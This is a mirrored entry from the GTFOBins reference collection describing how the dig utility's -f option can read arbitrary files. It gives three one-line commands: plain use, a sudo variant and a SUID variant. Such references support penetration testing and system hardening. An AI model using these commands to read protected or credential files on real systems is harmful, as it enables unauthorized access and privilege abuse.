1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/dig.md
2021-01-10 12:31:51 +01:00

504 B

description functions
Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation, so this may not be suitable for binary files. Grepping for `DiG` might help to filter out unwanted content.
file-read sudo suid
code
LFILE=file_to_read dig -f $LFILE
code
LFILE=file_to_read sudo dig -f $LFILE
code
LFILE=file_to_read ./dig -f $LFILE